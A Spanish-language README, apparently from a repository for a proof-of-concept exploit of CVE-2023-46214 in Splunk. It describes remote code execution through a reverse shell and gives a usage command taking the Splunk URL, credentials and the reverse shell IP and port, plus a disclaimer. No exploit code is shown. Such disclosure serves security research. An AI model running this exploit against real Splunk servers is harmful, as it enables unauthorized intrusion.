
PoC en Python para CVE-2023-46214 que explota la función adddatamethods de Splunk para lograr ejecución remota de código a través de una shell inversa.
Exploit de prueba de concepto para CVE-2023-46214, SVD-2023-1104

La URL de la instancia de Splunk, el nombre de usuario, la contraseña, la IP del shell inverso y el puerto son todos necesarios como parámetros de línea de comandos. Por ejemplo:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
He escrito una entrada de blog que detalla la metodología utilizada para descubrir esta vulnerabilidad. Si tienes algún problema con el script, el blog puede ser útil, ya que detalla los pasos manuales para la explotación.
Análisis de CVE-2023-46214 + PoC
El script de prueba de concepto (PoC) proporcionado en este repositorio sirve únicamente para fines educativos y de investigación. Su propósito es mostrar una vulnerabilidad específica y ayudar a comprender los riesgos de seguridad asociados.
Cualquier uso de este script para actividades no autorizadas, incluyendo, entre otros, el acceso no autorizado a sistemas, pruebas no autorizadas u otras formas de uso indebido, está terminantemente prohibido.
Los creadores y colaboradores de este repositorio rechazan toda responsabilidad por el uso indebido o cualquier daño o perjuicio resultante del uso de este script. Al utilizar este script, consientes usarlo de manera responsable y bajo tu propio riesgo.